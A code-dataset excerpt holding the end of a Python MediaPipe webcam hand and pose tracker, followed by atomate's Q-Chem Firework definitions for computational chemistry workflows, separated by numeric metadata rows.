with self.mp_hands.Hands( min_detection_confidence=0.5, min_tracking_confidence=0.5 ) as hands:
while cap.isOpened():
success, image = cap.read()
if not success:
print("Ignoring empty camera frame.")
# If loading a video, use 'break' instead of 'continue'.
continue
# Recolor Feed
image = cv2.cvtColor(image, cv2.COLOR_BGR2RGB)
image.flags.writeable = False
# Make Detections
results = hands.process(image)
# Recolor image back to BGR for rendering
image.flags.writeable = True
image = cv2.cvtColor(image, cv2.COLOR_RGB2BGR)
# hand detector results
if results.multi_hand_landmarks:
for hand_landmarks in results.multi_hand_landmarks:
self.mp_drawing.draw_landmarks(
image,
hand_landmarks,
self.mp_hands.HAND_CONNECTIONS,
landmark_drawing_spec=self.mp_drawing.DrawingSpec(color=(0, 0, 0), thickness=3, circle_radius=3),
connection_drawing_spec=self.mp_drawing.DrawingSpec(color=(255, 255, 255), thickness=2, circle_radius=2)
)
# flipping image
flip_image = cv2.flip(image, 1)
# fps
if show_fps==True:
cTime = time.time()
fps = 1 / (cTime - self.pTime)
self.pTime = cTime
cv2.putText(flip_image, str(int(fps)), (70, 50), cv2.FONT_HERSHEY_PLAIN, 3, (255, 0, 0), 3)
# showing flipped image
cv2.imshow('MediaPipe Holistic', flip_image)
# quitting
if cv2.waitKey(10) & 0xFF == ord('q'):
break
cap.release()
cv2.destroyAllWindows()
# ==================================================================================================
def pose(self, show_fps=True):
# capuring webcam 0
cap = cv2.VideoCapture(0)
with self.mp_pose.Pose( min_detection_confidence=0.5, min_tracking_confidence=0.5 ) as pose:
while cap.isOpened():
success, image = cap.read()
if not success:
print("Ignoring empty camera frame.")
# If loading a video, use 'break' instead of 'continue'.
continue
# Recolor Feed
image = cv2.cvtColor(image, cv2.COLOR_BGR2RGB)
image.flags.writeable = False
# Make Detections
results = pose.process(image)
# Recolor image back to BGR for rendering
image.flags.writeable = True
image = cv2.cvtColor(image, cv2.COLOR_RGB2BGR)
self.mp_drawing.draw_landmarks(
image,
results.pose_landmarks,
self.mp_pose.POSE_CONNECTIONS,
landmark_drawing_spec=self.mp_drawing_styles.DrawingSpec(color=(0,0,0), thickness=2, circle_radius=2),
connection_drawing_spec=self.mp_drawing_styles.DrawingSpec(color=(255, 255, 255), thickness=3, circle_radius=2)
)
# flipping image
flip_image = cv2.flip(image, 1)
# fps
if show_fps==True:
cTime = time.time()
fps = 1 / (cTime - self.pTime)
self.pTime = cTime
cv2.putText(flip_image, str(int(fps)), (70, 50), cv2.FONT_HERSHEY_PLAIN, 3, (255, 0, 0), 3)
# showing flipped image
cv2.imshow('MediaPipe Holistic', flip_image)
# quitting
if cv2.waitKey(10) & 0xFF == ord('q'):
break
cap.release()
cv2.destroyAllWindows()
# ================================================ class end ===============================================================
if __name__ == '__main__':
pipe = mediapipe()
pipe.simple_holistic()
| 33.054348
| 124
| 0.573167
| 1,363
| 12,164
| 4.91416
| 0.101247
| 0.043894
| 0.056285
| 0.043147
| 0.850552
| 0.843983
| 0.843983
| 0.832039
| 0.816363
| 0.806211
| 0
| 0.035234
| 0.27902
| 12,164
| 368
| 125
| 33.054348
| 0.728506
| 0.14732
| 0
| 0.714286
| 0
| 0
| 0.023569
| 0
| 0
| 0
| 0.00194
| 0
| 0
| 1
| 0.02765
| false
| 0
| 0.013825
| 0
| 0.046083
| 0.023041
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
f628266897bc73be2028fc72ce00a6d5ddaec41b
| 40,675
|
py
|
Python
|
atomate/qchem/fireworks/core.py
|
fraricci/atomate
|
ac8997888d79730a697aa166d5bcd516a7222d01
|
[
"BSD-3-Clause-LBNL"
] | null | null | null |
atomate/qchem/fireworks/core.py
|
fraricci/atomate
|
ac8997888d79730a697aa166d5bcd516a7222d01
|
[
"BSD-3-Clause-LBNL"
] | null | null | null |
atomate/qchem/fireworks/core.py
|
fraricci/atomate
|
ac8997888d79730a697aa166d5bcd516a7222d01
|
[
"BSD-3-Clause-LBNL"
] | null | null | null |
# Defines standardized Fireworks that can be chained easily to perform various
# sequences of QChem calculations.
import copy
from itertools import chain
from fireworks import Firework
from atomate.qchem.firetasks.critic2 import ProcessCritic2, RunCritic2
from atomate.qchem.firetasks.fragmenter import FragmentMolecule
from atomate.qchem.firetasks.geo_transformations import PerturbGeometry
from atomate.qchem.firetasks.parse_outputs import QChemToDb
from atomate.qchem.firetasks.run_calc import RunQChemCustodian
from atomate.qchem.firetasks.write_inputs import WriteInputFromIOSet
__author__ = "Samuel Blau, Evan Spotte-Smith"
__copyright__ = "Copyright 2018, The Materials Project"
__version__ = "0.1"
__maintainer__ = "Samuel Blau"
__email__ = "samblau1@gmail.com"
__status__ = "Alpha"
__date__ = "5/23/18"
__credits__ = "Brandon Wood, Shyam Dwaraknath"
class SinglePointFW(Firework):
def __init__(
self,
molecule=None,
name="single point",
qchem_cmd=">>qchem_cmd<<",
multimode=">>multimode<<",
max_cores=">>max_cores<<",
qchem_input_params=None,
db_file=None,
parents=None,
**kwargs
):
"""
Args:
molecule (Molecule): Input molecule.
name (str): Name for the Firework.
qchem_cmd (str): Command to run QChem. Supports env_chk.
multimode (str): Parallelization scheme, either openmp or mpi. Supports env_chk.
max_cores (int): Maximum number of cores to parallelize over. Supports env_chk.
qchem_input_params (dict): Specify kwargs for instantiating the input set parameters.
Basic uses would be to modify the default inputs of the set, such as dft_rung,
basis_set, pcm_dielectric, scf_algorithm, or max_scf_cycles. See
pymatgen/io/qchem/sets.py for default values of all input parameters. For
instance, if a user wanted to use a more advanced DFT functional, include a pcm
with a dielectric of 30, and use a larger basis, the user would set
qchem_input_params = {"dft_rung": 5, "pcm_dielectric": 30, "basis_set":
"6-311++g**"}. However, more advanced customization of the input is also
possible through the overwrite_inputs key which allows the user to directly
modify the rem, pcm, smd, and solvent dictionaries that QChemDictSet passes to
inputs.py to print an actual input file. For instance, if a user wanted to set
the sym_ignore flag in the rem section of the input file to true, then they
would set qchem_input_params = {"overwrite_inputs": "rem": {"sym_ignore":
"true"}}. Of course, overwrite_inputs could be used in conjunction with more
typical modifications, as seen in the test_double_FF_opt workflow test.
db_file (str): Path to file specifying db credentials to place output parsing.
parents ([Firework]): Parents of this particular Firework.
**kwargs: Other kwargs that are passed to Firework.__init__.
"""
qchem_input_params = qchem_input_params or {}
input_file = "mol.qin"
output_file = "mol.qout"
t = []
t.append(
WriteInputFromIOSet(
molecule=molecule,
qchem_input_set="SinglePointSet",
input_file=input_file,
qchem_input_params=qchem_input_params,
)
)
t.append(
RunQChemCustodian(
qchem_cmd=qchem_cmd,
multimode=multimode,
input_file=input_file,
output_file=output_file,
max_cores=max_cores,
job_type="normal",
)
)
t.append(
QChemToDb(
db_file=db_file,
input_file=input_file,
output_file=output_file,
additional_fields={"task_label": name},
)
)
super().__init__(t, parents=parents, name=name, **kwargs)
class ForceFW(Firework):
def __init__(
self,
molecule=None,
name="force calculation",
qchem_cmd=">>qchem_cmd<<",
multimode=">>multimode<<",
max_cores=">>max_cores<<",
qchem_input_params=None,
db_file=None,
parents=None,
**kwargs
):
"""
Converge the electron density and calculate the atomic forces, aka the gradient.
Args:
molecule (Molecule): Input molecule.
name (str): Name for the Firework.
qchem_cmd (str): Command to run QChem. Supports env_chk.
multimode (str): Parallelization scheme, either openmp or mpi. Defaults to openmp.
max_cores (int): Maximum number of cores to parallelize over. Supports env_chk.
qchem_input_params (dict): Specify kwargs for instantiating the input set parameters.
Basic uses would be to modify the default inputs of the set, such as dft_rung,
basis_set, pcm_dielectric, scf_algorithm, or max_scf_cycles. See
pymatgen/io/qchem/sets.py for default values of all input parameters. For
instance, if a user wanted to use a more advanced DFT functional, include a pcm
with a dielectric of 30, and use a larger basis, the user would set
qchem_input_params = {"dft_rung": 5, "pcm_dielectric": 30, "basis_set":
"6-311++g**"}. However, more advanced customization of the input is also
possible through the overwrite_inputs key which allows the user to directly
modify the rem, pcm, smd, and solvent dictionaries that QChemDictSet passes to
inputs.py to print an actual input file. For instance, if a user wanted to set
the sym_ignore flag in the rem section of the input file to true, then they
would set qchem_input_params = {"overwrite_inputs": "rem": {"sym_ignore":
"true"}}. Of course, overwrite_inputs could be used in conjunction with more
typical modifications, as seen in the test_double_FF_opt workflow test.
db_file (str): Path to file specifying db credentials to place output parsing.
parents ([Firework]): Parents of this particular Firework.
**kwargs: Other kwargs that are passed to Firework.__init__.
"""
qchem_input_params = qchem_input_params or {}
input_file = "mol.qin"
output_file = "mol.qout"
t = []
t.append(
WriteInputFromIOSet(
molecule=molecule,
qchem_input_set="ForceSet",
input_file=input_file,
qchem_input_params=qchem_input_params,
)
)
t.append(
RunQChemCustodian(
qchem_cmd=qchem_cmd,
multimode=multimode,
input_file=input_file,
output_file=output_file,
max_cores=max_cores,
job_type="normal",
)
)
t.append(
QChemToDb(
db_file=db_file,
input_file=input_file,
output_file=output_file,
additional_fields={"task_label": name},
)
)
super().__init__(t, parents=parents, name=name, **kwargs)
class OptimizeFW(Firework):
def __init__(
self,
molecule=None,
name="structure optimization",
qchem_cmd=">>qchem_cmd<<",
multimode=">>multimode<<",
max_cores=">>max_cores<<",
qchem_input_params=None,
db_file=None,
parents=None,
**kwargs
):
"""
Optimize the given structure.
Args:
molecule (Molecule): Input molecule.
name (str): Name for the Firework.
qchem_cmd (str): Command to run QChem. Supports env_chk.
multimode (str): Parallelization scheme, either openmp or mpi. Defaults to openmp.
max_cores (int): Maximum number of cores to parallelize over. Supports env_chk.
qchem_input_params (dict): Specify kwargs for instantiating the input set parameters.
Basic uses would be to modify the default inputs of the set, such as dft_rung,
basis_set, pcm_dielectric, scf_algorithm, or max_scf_cycles. See
pymatgen/io/qchem/sets.py for default values of all input parameters. For
instance, if a user wanted to use a more advanced DFT functional, include a pcm
with a dielectric of 30, and use a larger basis, the user would set
qchem_input_params = {"dft_rung": 5, "pcm_dielectric": 30, "basis_set":
"6-311++g**"}. However, more advanced customization of the input is also
possible through the overwrite_inputs key which allows the user to directly
modify the rem, pcm, smd, and solvent dictionaries that QChemDictSet passes to
inputs.py to print an actual input file. For instance, if a user wanted to set
the sym_ignore flag in the rem section of the input file to true, then they
would set qchem_input_params = {"overwrite_inputs": "rem": {"sym_ignore":
"true"}}. Of course, overwrite_inputs could be used in conjunction with more
typical modifications, as seen in the test_double_FF_opt workflow test.
db_file (str): Path to file specifying db credentials to place output parsing.
parents ([Firework]): Parents of this particular Firework.
**kwargs: Other kwargs that are passed to Firework.__init__.
"""
qchem_input_params = qchem_input_params or {}
input_file = "mol.qin"
output_file = "mol.qout"
t = []
t.append(
WriteInputFromIOSet(
molecule=molecule,
qchem_input_set="OptSet",
input_file=input_file,
qchem_input_params=qchem_input_params,
)
)
t.append(
RunQChemCustodian(
qchem_cmd=qchem_cmd,
multimode=multimode,
input_file=input_file,
output_file=output_file,
max_cores=max_cores,
job_type="normal",
)
)
t.append(
QChemToDb(
db_file=db_file,
input_file=input_file,
output_file=output_file,
additional_fields={"task_label": name},
)
)
super().__init__(t, parents=parents, name=name, **kwargs)
class TransitionStateFW(Firework):
def __init__(
self,
molecule=None,
name="transition state structure optimization",
qchem_cmd=">>qchem_cmd<<",
multimode=">>multimode<<",
max_cores=">>max_cores<<",
qchem_input_params=None,
db_file=None,
parents=None,
**kwargs
):
"""
Optimize the given molecule to a saddle point of the potential energy surface (transition
state).
Args:
molecule (Molecule): Input molecule.
name (str): Name for the Firework.
qchem_cmd (str): Command to run QChem. Supports env_chk.
multimode (str): Parallelization scheme, either openmp or mpi. Defaults to openmp.
max_cores (int): Maximum number of cores to parallelize over. Supports env_chk.
qchem_input_params (dict): Specify kwargs for instantiating the input set parameters.
Basic uses would be to modify the default inputs of the set, such as dft_rung,
basis_set, pcm_dielectric, scf_algorithm, or max_scf_cycles. See
pymatgen/io/qchem/sets.py for default values of all input parameters. For
instance, if a user wanted to use a more advanced DFT functional, include a pcm
with a dielectric of 30, and use a larger basis, the user would set
qchem_input_params = {"dft_rung": 5, "pcm_dielectric": 30, "basis_set":
"6-311++g**"}. However, more advanced customization of the input is also
possible through the overwrite_inputs key which allows the user to directly
modify the rem, pcm, smd, and solvent dictionaries that QChemDictSet passes to
inputs.py to print an actual input file. For instance, if a user wanted to set
the sym_ignore flag in the rem section of the input file to true, then they
would set qchem_input_params = {"overwrite_inputs": "rem": {"sym_ignore":
"true"}}. Of course, overwrite_inputs could be used in conjunction with more
typical modifications, as seen in the test_double_FF_opt workflow test.
db_file (str): Path to file specifying db credentials to place output parsing.
parents ([Firework]): Parents of this particular Firework.
**kwargs: Other kwargs that are passed to Firework.__init__.
"""
qchem_input_params = qchem_input_params or {}
input_file = "mol.qin"
output_file = "mol.qout"
t = list()
t.append(
WriteInputFromIOSet(
molecule=molecule,
qchem_input_set="TransitionStateSet",
input_file=input_file,
qchem_input_params=qchem_input_params,
)
)
t.append(
RunQChemCustodian(
qchem_cmd=qchem_cmd,
multimode=multimode,
input_file=input_file,
output_file=output_file,
max_cores=max_cores,
job_type="normal",
)
)
t.append(
QChemToDb(
db_file=db_file,
input_file=input_file,
output_file=output_file,
additional_fields={"task_label": name},
)
)
super().__init__(t, parents=parents, name=name, **kwargs)
class FrequencyFW(Firework):
def __init__(
self,
molecule=None,
name="frequency calculation",
qchem_cmd=">>qchem_cmd<<",
multimode=">>multimode<<",
max_cores=">>max_cores<<",
qchem_input_params=None,
db_file=None,
parents=None,
**kwargs
):
"""
Optimize the given structure.
Args:
molecule (Molecule): Input molecule.
name (str): Name for the Firework.
qchem_cmd (str): Command to run QChem. Supports env_chk.
multimode (str): Parallelization scheme, either openmp or mpi. Defaults to openmp.
max_cores (int): Maximum number of cores to parallelize over. Supports env_chk.
qchem_input_params (dict): Specify kwargs for instantiating the input set parameters.
Basic uses would be to modify the default inputs of the set, such as dft_rung,
basis_set, pcm_dielectric, scf_algorithm, or max_scf_cycles. See
pymatgen/io/qchem/sets.py for default values of all input parameters. For
instance, if a user wanted to use a more advanced DFT functional, include a pcm
with a dielectric of 30, and use a larger basis, the user would set
qchem_input_params = {"dft_rung": 5, "pcm_dielectric": 30, "basis_set":
"6-311++g**"}. However, more advanced customization of the input is also
possible through the overwrite_inputs key which allows the user to directly
modify the rem, pcm, smd, and solvent dictionaries that QChemDictSet passes to
inputs.py to print an actual input file. For instance, if a user wanted to set
the sym_ignore flag in the rem section of the input file to true, then they
would set qchem_input_params = {"overwrite_inputs": "rem": {"sym_ignore":
"true"}}. Of course, overwrite_inputs could be used in conjunction with more
typical modifications, as seen in the test_double_FF_opt workflow test.
db_file (str): Path to file specifying db credentials to place output parsing.
parents ([Firework]): Parents of this particular Firework.
**kwargs: Other kwargs that are passed to Firework.__init__.
"""
qchem_input_params = qchem_input_params or {}
input_file = "mol.qin"
output_file = "mol.qout"
t = []
t.append(
WriteInputFromIOSet(
molecule=molecule,
qchem_input_set="FreqSet",
input_file=input_file,
qchem_input_params=qchem_input_params,
)
)
t.append(
RunQChemCustodian(
qchem_cmd=qchem_cmd,
multimode=multimode,
input_file=input_file,
output_file=output_file,
max_cores=max_cores,
job_type="normal",
)
)
t.append(
QChemToDb(
db_file=db_file,
input_file=input_file,
output_file=output_file,
additional_fields={"task_label": name},
)
)
super().__init__(t, parents=parents, name=name, **kwargs)
class PESScanFW(Firework):
def __init__(
self,
molecule=None,
name="potential energy surface scan",
qchem_cmd=">>qchem_cmd<<",
multimode=">>multimode<<",
max_cores=">>max_cores<<",
qchem_input_params=None,
scan_variables=None,
db_file=None,
parents=None,
**kwargs
):
"""
Perform a potential energy surface scan by varying bond lengths, angles,
and/or dihedral angles in a molecule.
Args:
molecule (Molecule): Input molecule.
name (str): Name for the Firework.
qchem_cmd (str): Command to run QChem. Supports env_chk.
multimode (str): Parallelization scheme, either openmp or mpi. Supports env_chk.
max_cores (int): Maximum number of cores to parallelize over. Supports env_chk.
qchem_input_params (dict): Specify kwargs for instantiating the input set parameters.
Basic uses would be to modify the default inputs of the set,
such as dft_rung, basis_set, pcm_dielectric, scf_algorithm,
or max_scf_cycles. See pymatgen/io/qchem/sets.py for default
values of all input parameters. For instance, if a user wanted
to use a more advanced DFT functional, include a pcm with a
dielectric of 30, and use a larger basis, the user would set
qchem_input_params = {"dft_rung": 5, "pcm_dielectric": 30,
"basis_set": "6-311++g**"}. However, more advanced customization
of the input is also possible through the overwrite_inputs key
which allows the user to directly modify the rem, pcm, smd, and
solvent dictionaries that QChemDictSet passes to inputs.py to
print an actual input file.
scan_variables (dict): dict {str: list}, where the key is the type of variable ("stre"
for bond length, "bend" for angle, "tors" for dihedral angle),
and the list contains all of the variable set information
db_file (str): Path to file specifying db credentials to place output parsing.
parents ([Firework]): Parents of this particular Firework.
**kwargs: Other kwargs that are passed to Firework.__init__.
"""
if scan_variables is None:
raise ValueError(
"Some variable input must be given! Provide some "
"bond, angle, or dihedral angle information."
)
qchem_input_params = qchem_input_params or dict()
qchem_input_params["scan_variables"] = scan_variables
input_file = "mol.qin"
output_file = "mol.qout"
t = list()
t.append(
WriteInputFromIOSet(
molecule=molecule,
qchem_input_set="PESScanSet",
input_file=input_file,
qchem_input_params=qchem_input_params,
)
)
t.append(
RunQChemCustodian(
qchem_cmd=qchem_cmd,
multimode=multimode,
input_file=input_file,
output_file=output_file,
max_cores=max_cores,
job_type="normal",
)
)
t.append(
QChemToDb(
db_file=db_file,
input_file=input_file,
output_file=output_file,
additional_fields={"task_label": name},
)
)
super().__init__(t, parents=parents, name=name, **kwargs)
class FrequencyFlatteningOptimizeFW(Firework):
def __init__(
self,
molecule=None,
name="frequency flattening structure optimization",
qchem_cmd=">>qchem_cmd<<",
multimode=">>multimode<<",
max_cores=">>max_cores<<",
qchem_input_params=None,
max_iterations=10,
max_molecule_perturb_scale=0.3,
linked=True,
freq_before_opt=False,
perturb_geometry=False,
mode=None,
scale=1.0,
db_file=None,
parents=None,
**kwargs
):
"""
Iteratively optimize the given structure and flatten imaginary frequencies to ensure that
the resulting structure is a true minima and not a saddle point.
Args:
molecule (Molecule): Input molecule.
name (str): Name for the Firework.
qchem_cmd (str): Command to run QChem. Supports env_chk.
multimode (str): Parallelization scheme, either openmp or mpi. Supports env_chk.
max_cores (int): Maximum number of cores to parallelize over. Supports env_chk.
qchem_input_params (dict): Specify kwargs for instantiating the input set parameters.
Basic uses would be to modify the default inputs of the set, such as dft_rung,
basis_set, pcm_dielectric, scf_algorithm, or max_scf_cycles. See
pymatgen/io/qchem/sets.py for default values of all input parameters. For
instance, if a user wanted to use a more advanced DFT functional, include a pcm
with a dielectric of 30, and use a larger basis, the user would set
qchem_input_params = {"dft_rung": 5, "pcm_dielectric": 30, "basis_set":
"6-311++g**"}. However, more advanced customization of the input is also
possible through the overwrite_inputs key which allows the user to directly
modify the rem, pcm, smd, and solvent dictionaries that QChemDictSet passes to
inputs.py to print an actual input file. For instance, if a user wanted to set
the sym_ignore flag in the rem section of the input file to true, then they
would set qchem_input_params = {"overwrite_inputs": "rem": {"sym_ignore":
"true"}}. Of course, overwrite_inputs could be used in conjunction with more
typical modifications, as seen in the test_double_FF_opt workflow test.
max_iterations (int): Number of perturbation -> optimization -> frequency
iterations to perform. Defaults to 10.
max_molecule_perturb_scale (float): The maximum scaled perturbation that can be
applied to the molecule. Defaults to 0.3.
freq_before_opt (bool): If True (default False), run a frequency
calculation before any opt/ts searches to improve understanding
of the local potential energy surface. Only use this option if
linked=True.
perturb_geometry (bool): If True (default False), then modify the input geometry by some
translation matrix (N x 3, where N is the number of atoms) before optimizing.
mode (np.ndarray): If not None (default), then perturb the geometry by this matrix.
This will be ignored if perturb_geometry is False.
scale (float): Scaling factor for perturbation
db_file (str): Path to file specifying db credentials to place output parsing.
parents ([Firework]): Parents of this particular Firework.
**kwargs: Other kwargs that are passed to Firework.__init__.
"""
qchem_input_params = qchem_input_params or {}
input_file = "mol.qin"
output_file = "mol.qout"
t = []
if perturb_geometry:
t.append(PerturbGeometry(molecule=molecule, mode=mode, scale=scale))
# Make sure that subsequent firetasks use the perturbed Molecule
molecule = None
if freq_before_opt:
t.append(
WriteInputFromIOSet(
molecule=molecule,
qchem_input_set="FreqSet",
input_file=input_file,
qchem_input_params=qchem_input_params,
)
)
else:
t.append(
WriteInputFromIOSet(
molecule=molecule,
qchem_input_set="OptSet",
input_file=input_file,
qchem_input_params=qchem_input_params,
)
)
t.append(
RunQChemCustodian(
qchem_cmd=qchem_cmd,
multimode=multimode,
input_file=input_file,
output_file=output_file,
max_cores=max_cores,
job_type="opt_with_frequency_flattener",
max_iterations=max_iterations,
max_molecule_perturb_scale=max_molecule_perturb_scale,
linked=linked,
freq_before_opt=freq_before_opt,
)
)
t.append(
QChemToDb(
db_file=db_file,
input_file=input_file,
output_file=output_file,
additional_fields={
"task_label": name,
"special_run_type": "frequency_flattener",
"linked": linked,
},
)
)
super().__init__(t, parents=parents, name=name, **kwargs)
class FrequencyFlatteningTransitionStateFW(Firework):
def __init__(
self,
molecule=None,
name="frequency flattening transition state optimization",
qchem_cmd=">>qchem_cmd<<",
multimode=">>multimode<<",
max_cores=">>max_cores<<",
qchem_input_params=None,
max_iterations=3,
max_molecule_perturb_scale=0.3,
linked=True,
freq_before_opt=True,
perturb_geometry=False,
mode=None,
scale=1,
db_file=None,
parents=None,
**kwargs
):
"""
Iteratively optimize the transition state structure and flatten imaginary frequencies to
ensure that the resulting structure is a true transition state.
Args:
molecule (Molecule): Input molecule.
name (str): Name for the Firework.
qchem_cmd (str): Command to run QChem. Supports env_chk.
multimode (str): Parallelization scheme, either openmp or mpi. Supports env_chk.
max_cores (int): Maximum number of cores to parallelize over. Supports env_chk.
qchem_input_params (dict): Specify kwargs for instantiating the input set parameters.
Basic uses would be to modify the default inputs of the set, such as dft_rung,
basis_set, pcm_dielectric, scf_algorithm, or max_scf_cycles. See
pymatgen/io/qchem/sets.py for default values of all input parameters. For
instance, if a user wanted to use a more advanced DFT functional, include a pcm
with a dielectric of 30, and use a larger basis, the user would set
qchem_input_params = {"dft_rung": 5, "pcm_dielectric": 30, "basis_set":
"6-311++g**"}. However, more advanced customization of the input is also
possible through the overwrite_inputs key which allows the user to directly
modify the rem, pcm, smd, and solvent dictionaries that QChemDictSet passes to
inputs.py to print an actual input file. For instance, if a user wanted to set
the sym_ignore flag in the rem section of the input file to true, then they
would set qchem_input_params = {"overwrite_inputs": "rem": {"sym_ignore":
"true"}}. Of course, overwrite_inputs could be used in conjunction with more
typical modifications, as seen in the test_double_FF_opt workflow test.
max_iterations (int): Number of perturbation -> optimization -> frequency
iterations to perform. Defaults to 3. Higher numbers are not recommended, as
they rarely lead to improved performance.
max_molecule_perturb_scale (float): The maximum scaled perturbation that can be
applied to the molecule. Defaults to 0.3.
linked (bool): If True (default False), the scratch output from one calculation will be passed
from one calculation to the next, improving convergence behavior.
freq_before_opt (bool): If True (default False), run a frequency
calculation before any opt/ts searches to improve understanding
of the local potential energy surface. Only use this option if
linked=True.
perturb_geometry (bool): If True (default False), then modify the input geometry by some
translation matrix (N x 3, where N is the number of atoms) before optimizing.
mode (np.ndarray): If not None (default), then perturb the geometry by this matrix.
This will be ignored if perturb_geometry is False.
scale (float): Scaling factor for the geometry perturbation.
db_file (str): Path to file specifying db credentials to place output parsing.
parents ([Firework]): Parents of this particular Firework.
**kwargs: Other kwargs that are passed to Firework.__init__.
"""
qchem_input_params = qchem_input_params or {}
input_file = "mol.qin"
output_file = "mol.qout"
runs = list(
chain.from_iterable(
[["ts_" + str(ii), "freq_" + str(ii)] for ii in range(10)]
)
)
if freq_before_opt:
runs.insert(0, "freq_pre")
t = list()
if perturb_geometry:
t.append(PerturbGeometry(molecule=molecule, mode=mode, scale=scale))
# Make sure that subsequent firetasks use the perturbed Molecule
molecule = None
if freq_before_opt:
t.append(
WriteInputFromIOSet(
molecule=molecule,
qchem_input_set="FreqSet",
input_file=input_file,
qchem_input_params=qchem_input_params,
)
)
else:
t.append(
WriteInputFromIOSet(
molecule=molecule,
qchem_input_set="TransitionStateSet",
input_file=input_file,
qchem_input_params=qchem_input_params,
)
)
t.append(
RunQChemCustodian(
qchem_cmd=qchem_cmd,
multimode=multimode,
input_file=input_file,
output_file=output_file,
max_cores=max_cores,
job_type="opt_with_frequency_flattener",
max_iterations=max_iterations,
max_molecule_perturb_scale=max_molecule_perturb_scale,
transition_state=True,
linked=linked,
freq_before_opt=freq_before_opt,
)
)
t.append(
QChemToDb(
db_file=db_file,
input_file=input_file,
output_file=output_file,
runs=runs,
additional_fields={
"task_label": name,
"special_run_type": "ts_frequency_flattener",
"linked": linked,
},
)
)
super().__init__(t, parents=parents, name=name, **kwargs)
class FragmentFW(Firework):
def __init__(
self,
molecule=None,
depth=1,
open_rings=True,
additional_charges=None,
do_triplets=True,
linked=False,
name="fragment and optimize",
qchem_input_params=None,
db_file=None,
check_db=True,
parents=None,
**kwargs
):
"""
Fragment the given structure and optimize all unique fragments
Args:
molecule (Molecule): Input molecule.
depth (int): Fragmentation depth. Defaults to 1. See fragmenter firetask for more details.
open_rings (bool): Whether or not to open any rings encountered during fragmentation.
Defaults to True. See fragmenter firetask for more details.
additional_charges (list): List of additional charges besides the defaults. See fragmenter
firetask for more details.
do_triplets (bool): Whether to simulate triplets as well as singlets for molecules with an
even number of electrons. Defaults to True.
name (str): Name for the Firework.
qchem_input_params (dict): Specify kwargs for instantiating the input set parameters.
Basic uses would be to modify the default inputs of the set, such as dft_rung,
basis_set, pcm_dielectric, scf_algorithm, or max_scf_cycles. See
pymatgen/io/qchem/sets.py for default values of all input parameters. For
instance, if a user wanted to use a more advanced DFT functional, include a pcm
with a dielectric of 30, and use a larger basis, the user would set
qchem_input_params = {"dft_rung": 5, "pcm_dielectric": 30, "basis_set":
"6-311++g**"}. However, more advanced customization of the input is also
possible through the overwrite_inputs key which allows the user to directly
modify the rem, pcm, smd, and solvent dictionaries that QChemDictSet passes to
inputs.py to print an actual input file. For instance, if a user wanted to set
the sym_ignore flag in the rem section of the input file to true, then they
would set qchem_input_params = {"overwrite_inputs": "rem": {"sym_ignore":
"true"}}. Of course, overwrite_inputs could be used in conjunction with more
typical modifications, as seen in the test_double_FF_opt workflow test.
db_file (str): Path to file specifying db credentials to place output parsing.
check_db (bool): Whether or not to check the database for equivalent structures
before adding new fragment fireworks. Defaults to True.
parents ([Firework]): Parents of this particular Firework.
**kwargs: Other kwargs that are passed to Firework.__init__.
"""
qchem_input_params = qchem_input_params or {}
additional_charges = additional_charges or []
t = []
t.append(
FragmentMolecule(
molecule=molecule,
depth=depth,
open_rings=open_rings,
additional_charges=additional_charges,
do_triplets=do_triplets,
linked=linked,
qchem_input_params=qchem_input_params,
db_file=db_file,
check_db=check_db,
)
)
super().__init__(t, parents=parents, name=name, **kwargs)
class CubeAndCritic2FW(Firework):
def __init__(
self,
molecule=None,
name="cube and critic2",
qchem_cmd=">>qchem_cmd<<",
multimode=">>multimode<<",
max_cores=">>max_cores<<",
qchem_input_params=None,
db_file=None,
parents=None,
**kwargs
):
"""
Perform a Q-Chem single point calculation in order to generate a cube file of the electron density
and then analyze the electron density critical points with the Critic2 package.
Args:
molecule (Molecule): Input molecule.
name (str): Name for the Firework.
qchem_cmd (str): Command to run QChem. Supports env_chk.
multimode (str): Parallelization scheme, either openmp or mpi. Supports env_chk.
max_cores (int): Maximum number of cores to parallelize over. Supports env_chk.
qchem_input_params (dict): Specify kwargs for instantiating the input set parameters.
Basic uses would be to modify the default inputs of the set, such as dft_rung,
basis_set, pcm_dielectric, scf_algorithm, or max_scf_cycles. See
pymatgen/io/qchem/sets.py for default values of all input parameters. For
instance, if a user wanted to use a more advanced DFT functional, include a pcm
with a dielectric of 30, and use a larger basis, the user would set
qchem_input_params = {"dft_rung": 5, "pcm_dielectric": 30, "basis_set":
"6-311++g**"}. However, more advanced customization of the input is also
possible through the overwrite_inputs key which allows the user to directly
modify the rem, pcm, smd, and solvent dictionaries that QChemDictSet passes to
inputs.py to print an actual input file. For instance, if a user wanted to set
the sym_ignore flag in the rem section of the input file to true, then they
would set qchem_input_params = {"overwrite_inputs": "rem": {"sym_ignore":
"true"}}. Of course, overwrite_inputs could be used in conjunction with more
typical modifications, as seen in the test_double_FF_opt workflow test.
db_file (str): Path to file specifying db credentials to place output parsing.
parents ([Firework]): Parents of this particular Firework.
**kwargs: Other kwargs that are passed to Firework.__init__.
"""
qchem_input_params = copy.deepcopy(qchem_input_params) or {}
qchem_input_params["plot_cubes"] = True
input_file = "mol.qin"
output_file = "mol.qout"
t = []
t.append(
WriteInputFromIOSet(
molecule=molecule,
qchem_input_set="SinglePointSet",
input_file=input_file,
qchem_input_params=qchem_input_params,
)
)
t.append(
RunQChemCustodian(
qchem_cmd=qchem_cmd,
multimode=multimode,
input_file=input_file,
output_file=output_file,
max_cores=max_cores,
job_type="normal",
)
)
t.append(RunCritic2(molecule=molecule, cube_file="dens.0.cube.gz"))
t.append(ProcessCritic2(molecule=molecule))
t.append(
QChemToDb(
db_file=db_file,
input_file=input_file,
output_file=output_file,
additional_fields={"task_label": name},
)
)
super().__init__(t, parents=parents, name=name, **kwargs)
| 45.80518
| 106
| 0.593092
| 4,700
| 40,675
| 4.939574
| 0.082766
| 0.041351
| 0.05858
| 0.022484
| 0.877498
| 0.873406
| 0.86617
| 0.850362
| 0.846011
| 0.833262
| 0
| 0.005028
| 0.339939
| 40,675
| 887
| 107
| 45.856821
| 0.859692
| 0.529269
| 0
| 0.727447
| 0
| 0
| 0.085773
| 0.004679
| 0
| 0
| 0
| 0
| 0
| 1
| 0.019194
| false
| 0
